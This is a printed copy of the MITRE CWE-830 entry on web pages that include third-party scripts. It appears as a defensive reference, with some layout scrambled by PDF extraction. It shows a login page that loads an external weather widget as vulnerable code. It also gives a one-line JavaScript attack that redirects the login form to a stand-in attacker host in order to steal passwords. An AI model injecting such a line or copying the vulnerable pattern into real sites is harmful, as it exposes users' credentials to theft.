3/7/24, 3:11 PM CWE - CWE-830: Inclusion of Web Functionality from an Untrusted Source (4.14)
https://cwe.mitre.org/data/deﬁnitions/830.html 1/2
Common W eakness Enumeration
A community-developed list of SW & HW weaknesses that can become
vulnerabilities
Home Search
CWE-830: Inclusion of W eb Functionality from an Untrusted Source
Weakness ID: 830
Vulnerability Mapping: 
View customized information:
 Description
The product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of
the product, potentially granting total access and control of the product to the untrusted source.
 Extended Description
Including third party functionality in a web-based environment is risky , especially if the source of the functionality is untrusted.
Even if the third party is a trusted source, the product may still be exposed to attacks and malicious behavior if that trusted source is
compromised, or if the code is modified in transmission from the third party to the product.
This weakness is common in "mashup" development on the web, which may include source functionality from other domains. For
example, Javascript-based web widgets may be inserted by using '' tags, which causes the
code to run in the domain of the product, not the remote site from which the widget was loaded. As a result, the included code has
access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access.
Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists.
 Relationships
 Relevant to the view "Research Concepts" (CWE-1000)
Nature Type ID Name
ChildOf 829 Inclusion of Functionality from Untrusted Control Sphere
 Relevant to the view "Architectural Concepts" (CWE-1008)
 Modes Of Introduction
Phase Note
Implementation REALIZA TION: This weakness is caused during implementation of an architectural security tactic.
 Common Consequences
Scope Impact Likelihood
Confidentiality
Integrity
AvailabilityTechnical Impact: Execute Unauthorized Code or Commands
 Demonstrative Examples
Example 1
This login webpage includes a weather widget from an external website:
This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external
domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS
weakness ( CWE-79 ).About ▼ CWE List ▼ Mapping ▼ Top-N Lists ▼ Community ▼ News ▼
ALLOWED
Abstraction: Variant
Conceptual OperationalMapping
FriendlyComplete Custom
(bad code) Example Language: HTML 
<div class="header"> Welcome!
<div id="loginBox">Please Login:
<form id ="loginForm" name="loginForm" action="login.php" method="post">
Username: <input type="text" name="username" />
<br/>
Password: <input type="password" name="password" />
<input type="submit" value="Login" />
</form>
</div>
<div id="WeatherWidget">
<script type="text/javascript" src="externalDomain.example.com/weatherwidget.js">

3/7/24, 3:11 PM CWE - CWE-830: Inclusion of Web Functionality from an Untrusted Source (4.14)
https://cwe.mitre.org/data/deﬁnitions/830.html 2/2For example, user login information could easily be stolen with a single line added to weatherwidget.js:
This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user
attempts to login their username and password will be sent directly to the attack site.
 Memberships
Nature Type ID Name
MemberOf 1354 OWASP Top Ten 2021 Category A08:2021 - Software and Data Integrity Failures
MemberOf 1416 Comprehensive Categorization: Resource Lifecycle Management
 Vulnerability Mapping Notes
Usage: ALLOWED (this CWE ID could be used to map to real-world vulnerabilities)
Reason: Acceptable-Use
Rationale:
This CWE entry is at the V ariant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of
vulnerabilities.
Comments:
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a
lower-level Base/V ariant simply to comply with this preferred level of abstraction.
 References
[REF-778] Jeremiah Grossman. "Third-Party W eb Widget Security F AQ". < https://blog.jeremiahgrossman.com/2010/07/third-
party-web-widget-security-faq.html >. URL validated: 2023-04-07 .
 Content History
 Submissions
Submission Date Submitter Organization
2010-12-08
(CWE 1.11, 2010-12-13)CWE Content Team MITRE
 Modifications
(attack code) Example Language: JavaScript 
...Weather widget code....
document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php";